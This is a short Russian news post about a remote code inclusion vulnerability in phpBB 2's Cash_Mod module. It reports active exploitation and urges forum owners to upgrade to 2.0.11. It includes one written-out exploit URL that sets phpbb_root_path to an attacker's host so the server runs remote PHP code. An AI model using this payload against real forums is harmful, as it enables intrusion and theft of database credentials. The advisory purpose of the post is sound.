В модуле Cash_Mod популярного форумного движка phpBB 2 несколько дней назад была обнаружена опасная уязвимость.

С помощью опубликованного в интернете эксплоита (http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513) удаленный атакующий имеет возможность выполнить на уязвимой системе собственный
HP-код таким образом:

http://хост.жертвы/phpBB2/admin/admin_cash.php?setmodules=1&phpbb_root_path=http://хост.атакующего/

Проблема в том, пишет ежедневное интернет-издание “Вебпланета”, что на движке phpBB работает большое количество форумов в Рунете, и для их владельцев сегодняшний день стал настоящим кошмаром. Анализ логов показал, что банды российских хакеров с сегодняшнего дня уже вовсю начали использовать опубликованный эксплоит, который позволяет проникнуть в систему, получить пароли к базе данных, и скрыться незаметно для владельца форума.

Судя по всему, многие владельцы форумов на phpBB 2 до сих не осознали существующей опасности. Им нужно срочно закрыть доступ к форумам и оперативно устранить уязвимость – вчера была опубликована пропатченная версия phpBB 2.0.11 (http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=240636). После этого можно посмотреть в логах, что успели утащить хакеры и при необходимости поменять пароли.

By Ruslan Novikov

Интернет-предприниматель. Фулстек разработчик. Маркетолог. Наставник.